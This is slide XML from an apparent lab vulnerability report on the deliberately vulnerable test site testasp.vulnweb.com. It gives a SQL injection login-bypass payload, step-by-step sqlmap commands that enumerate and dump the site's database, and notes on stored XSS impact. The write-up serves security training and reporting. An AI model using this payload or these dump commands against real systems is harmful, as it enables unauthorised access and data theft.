        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="313200" y="946800"/>
            <a:ext cx="8229600" cy="393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SQL Injection In http://testasp.vulnweb.com</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Google Shape;66;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8768100" cy="388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a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Summary:</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>testasp.vulnweb.com is highly vulnerable to sql injection attack.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The username and password field of the login page url "http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" can be bypassed and the complete database can be accessed by manipulating the id parameter of the urls like "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://testasp.vulnweb.com/showforum.asp?id=XX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" or “http://testasp.vulnweb.com/showthread.asp?id=XX” where XX is any valid and available id number. The url can be found by selecting any category in the forum section and selecting any thread in that category.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>As per OWASP's definition Sql injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tool Used:-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQLmap</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242" name="Google Shape;242;p42"/>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4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) Injection/Payload Effect:-</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="243" name="Google Shape;243;p42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="313200" y="946800"/>
            <a:ext cx="8229600" cy="3934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259175" y="6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Supporting Material/References:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="249" name="Google Shape;249;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="57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Video Demonstration:-</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://drive.google.com/file/d/1U0YVlONwoWgnecYHpwpY_xoyziLEmpcs/view?usp=sharing</a:t>
            </a:r>
            <a:endParaRPr sz="1550">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="250" name="Google Shape;250;p43" title="Task3StoredXSS.mp4">
            <a:hlinkClick r:id="rId3"/>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="396000" y="1440000"/>
            <a:ext cx="8229600" cy="345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Impact:-</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="256" name="Google Shape;256;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="3728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GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Malicious code can be executed on the browser of visitors visiting the infected webpage and can fully compromise them.</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Stored XSS have self contained and persistent nature meaning that the infected website will serve the attacker unitil the infected webpage gets detected and sanitized.</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It can be tough to detect in websites where there is a huge number of webpages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker can:-</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-334327" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Perform any action within the application that the user can perform.</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View any information that the user is able to view.             </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Modify any information that the user is able to modify.             </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Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.                          </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214725" y="4585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pic>
        <p:nvPicPr>
          <p:cNvPr id="262" name="Google Shape;262;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297125" y="1535550"/>
            <a:ext cx="5925142" cy="281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reproduce:-</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Google Shape;72;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="3859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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The login page can be bypassed by putting ' or '1 '='1 in username and password field.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In order to access the details of the complete database attacker can open the sqlmap software and run a scan with following commands:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-334327" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The below command gives the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> about the database and the operating system used on the server side:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo sqlmap -u "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://testasp.vulnweb.com/showforum.asp?id=0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:b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The below command lists all the databases present in the DBMS present at the server side.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo sqlmap -u "http://testasp.vulnweb.com/showforum.asp?id=0" --dbs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Reproduce (Continued...)</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The below command lists all the tables present in the particular database (say databasename) present at the server's Database.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo sqlmap -u "http://testasp.vulnweb.com/showforum.asp?id=0" -D databasename --tables</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB">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 below command lists all the column of specified table (say tablename) :-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo sqlmap -u "http://testasp.vulnweb.com/showforum.asp?id=0" -T tablename --columns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Steps To Reproduce (Continued...)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="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The below command gives all the entries of the specified columns (specified at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>coulumnameslistseparatedbycomma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) of the specified table (say tablename).</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo sqlmap -u "http://testasp.vulnweb.com/showforum.asp?id=0" -T tablename -C coulumnameslistseparatedbycomma --dump</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Steps To Reproduce (Continued...)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Commands I have executed are:-</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sudo sqlmap -u "http://testasp.vulnweb.com/showforum.asp?id=0"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sudo sqlmap -u "http://testasp.vulnweb.com/showforum.asp?id=0"  --dbs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sudo sqlmap -u "http://testasp.vulnweb.com/showforum.asp?id=0" -D master --tables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sudo sqlmap -u "http://testasp.vulnweb.com/showforum.asp?id=0" -T INFORMATION_SCHEMA.SCHEMATA --columns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sudo sqlmap -u "http://testasp.vulnweb.com/showforum.asp?id=0" -T INFORMATION_SCHEMA.SCHEMATA -C CATALOG_NAME,SCHEMA_NAME --dump</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96" name="Google Shape;96;p20"/>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1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Login Bypassed:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="97" name="Google Shape;97;p20"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="313200" y="946800"/>
            <a:ext cx="8229600" cy="3935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POC Screenshots</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="Google Shape;103;p21"/>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2) Basic Details of Database:-</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="104" name="Google Shape;104;p21"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="946800"/>
            <a:ext cx="8229600" cy="393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